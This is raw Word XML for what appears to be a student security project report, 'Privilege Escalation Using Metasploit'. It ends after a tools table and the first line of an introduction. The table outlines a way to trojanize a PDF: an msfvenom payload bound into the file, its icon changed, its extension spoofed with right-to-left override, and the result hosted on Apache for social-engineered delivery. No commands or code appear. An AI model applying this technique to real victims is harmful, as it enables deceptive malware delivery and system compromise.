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612"/>
        <w:tblW w:w="9745" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4742"/>
        <w:gridCol w:w="5003"/>
      </w:tblGrid>
      <w:tr w:rsidR="00034CC0" w:rsidRPr="00A743C7" w14:paraId="361691D9" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="646"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="30BF4DC0" w14:textId="302C8640" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="00735588" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>PRIVILEGE ESCALATION USING METASPLOIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00034CC0" w:rsidRPr="00A743C7" w14:paraId="582CC406" w14:textId="0E7B8AF4" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="624"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4742" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD3FA0E" w14:textId="1C024857" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="00034CC0" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A743C7">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Team Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5003" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="348E62BF" w14:textId="6BA18CBF" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="00735588" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933B4C" w:rsidRPr="00A743C7" w14:paraId="491EA671" w14:textId="0F9624A1" w:rsidTr="000E40E3">
        <w:trPr>
          <w:trHeight w:val="524"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4742" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74ED27D9" w14:textId="5253EC4C" w:rsidR="00933B4C" w:rsidRPr="00A743C7" w:rsidRDefault="00933B4C" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A743C7">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Team Names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5003" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E07E32C" w14:textId="34568C8A" w:rsidR="00933B4C" w:rsidRPr="00A743C7" w:rsidRDefault="00933B4C" w:rsidP="00933B4C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Sabyasachi Banerjee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00034CC0" w:rsidRPr="00A743C7" w14:paraId="08D703B7" w14:textId="3955A543" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="624"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4742" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="476856CE" w14:textId="1AFDAE1B" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="00034CC0" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A743C7">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Mentor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5003" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B1D1F5" w14:textId="102C66BC" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="000A6A53" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Jonathan Peter</w:t>
            </w:r>
            <w:r w:rsidR="006730E0">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00034CC0" w:rsidRPr="00A743C7" w14:paraId="45A2DB9D" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="536"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4742" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504ADCC7" w14:textId="56123ED1" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="00034CC0" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A743C7">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Team SPOC Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5003" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6304AE62" w14:textId="2DF6DF13" w:rsidR="00034CC0" w:rsidRPr="00A743C7" w:rsidRDefault="000A6A53" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>9064530225</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5045D" w:rsidRPr="00A743C7" w14:paraId="1D3FA940" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7C9C8FA5" w14:textId="5C312277" w:rsidR="00FD7937" w:rsidRPr="00DB2FD1" w:rsidRDefault="00FD7937" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB2FD1">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Key Terms/Technologies Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD7937" w:rsidRPr="00414BAA" w14:paraId="369D90BD" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="2CD65C3E" w14:textId="430CBF2C" w:rsidR="00FD7937" w:rsidRPr="00414BAA" w:rsidRDefault="00512A6C" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FD7937" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>.Kali Linux Oper</w:t>
            </w:r>
            <w:r w:rsidR="00826B86">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00FD7937" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>ting System</w:t>
            </w:r>
            <w:r w:rsidR="00372661" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>-&gt;Attacker’s Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD7937" w:rsidRPr="00414BAA" w14:paraId="238D0C32" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="12C4D0DB" w14:textId="0CFB5DE7" w:rsidR="00FD7937" w:rsidRPr="00414BAA" w:rsidRDefault="00FD7937" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>.Windows Operating Syste</w:t>
            </w:r>
            <w:r w:rsidR="00372661" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>m-&gt;Victim’s Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372661" w:rsidRPr="00414BAA" w14:paraId="29F09F10" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="67510318" w14:textId="1494DEA0" w:rsidR="00372661" w:rsidRPr="00414BAA" w:rsidRDefault="00372661" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>.Msfvenom-&gt;Stand-Alone Application used to generate Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372661" w:rsidRPr="00414BAA" w14:paraId="4C395F40" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1E235324" w14:textId="29CD5DBD" w:rsidR="00372661" w:rsidRPr="00414BAA" w:rsidRDefault="00372661" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>Metasploit-&gt;Used for finding potential exploits,privilege Escalation and also  listening for incoming connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372661" w:rsidRPr="00414BAA" w14:paraId="26764AC9" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7C1E036C" w14:textId="573EC484" w:rsidR="00372661" w:rsidRPr="00414BAA" w:rsidRDefault="00372661" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>Celesty File Binder-&gt;</w:t>
            </w:r>
            <w:r w:rsidR="0010320B" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>This tool is used for integrating the pdf and the payload.</w:t>
            </w:r>
            <w:r w:rsidR="0009148B">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0010320B" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>It is also responsible for changing the payload icon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0010320B" w:rsidRPr="00414BAA" w14:paraId="1547F5F5" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4971293D" w14:textId="631DE4F0" w:rsidR="0010320B" w:rsidRPr="00414BAA" w:rsidRDefault="0010320B" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>Characters-&gt;This is a GUI application used in kali Linux.</w:t>
            </w:r>
            <w:r w:rsidR="0009148B">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>With the help of this we can override right to left characters</w:t>
            </w:r>
            <w:r w:rsidR="00486019" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0009148B">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00486019" w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>This is useful for spoofing the extension of the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00486019" w:rsidRPr="00414BAA" w14:paraId="7EC9A4A5" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="36B9539E" w14:textId="5169EDED" w:rsidR="00486019" w:rsidRPr="00414BAA" w:rsidRDefault="00486019" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t>Apache2 Web Server-&gt;We will use this to host our payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00486019" w:rsidRPr="00414BAA" w14:paraId="14538DD5" w14:textId="77777777" w:rsidTr="00B277C5">
        <w:trPr>
          <w:trHeight w:val="673"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9745" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1DE27948" w14:textId="1B662D0A" w:rsidR="00486019" w:rsidRPr="00414BAA" w:rsidRDefault="00486019" w:rsidP="00B277C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512A6C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidRPr="00414BAA">
              <w:rPr>
                <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
              </w:rPr>
              <w:t xml:space="preserve">Social Engineering-&gt;Social Engineering means  manipulating someone to do something. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FFFAB18" w14:textId="14B8E6E8" w:rsidR="00DA58D7" w:rsidRPr="00414BAA" w:rsidRDefault="00DA58D7" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147F0D11" w14:textId="77777777" w:rsidR="00FD7937" w:rsidRDefault="00FD7937" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694D5544" w14:textId="56CD09F6" w:rsidR="000A6A53" w:rsidRDefault="000A6A53" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130410AA" w14:textId="1E000B9F" w:rsidR="000A6A53" w:rsidRDefault="000A6A53" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CA9FA4" w14:textId="325B17FE" w:rsidR="000A6A53" w:rsidRDefault="000A6A53" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB434B4" w14:textId="7B56CE87" w:rsidR="000A6A53" w:rsidRDefault="000A6A53" w:rsidP="00DA58D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3E1C09" w14:textId="60761B1D" w:rsidR="000A6A53" w:rsidRPr="00DB2FD1" w:rsidRDefault="00A65F61" w:rsidP="00DB2FD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE25D31" w14:textId="2858DFC3" w:rsidR="0015548B" w:rsidRDefault="00A47E3C" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>The main theme of the project is Privilege Escalation using Metasploit.</w:t>
      </w:r>
      <w:r w:rsidR="00D15D28">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have two terms, Privilege </w:t>
      </w:r>
      <w:r w:rsidR="00D15D28">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D15D28">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>and Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D0A49" w14:textId="342F7742" w:rsidR="004607B4" w:rsidRPr="00DB2FD1" w:rsidRDefault="004607B4" w:rsidP="00DB2FD1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
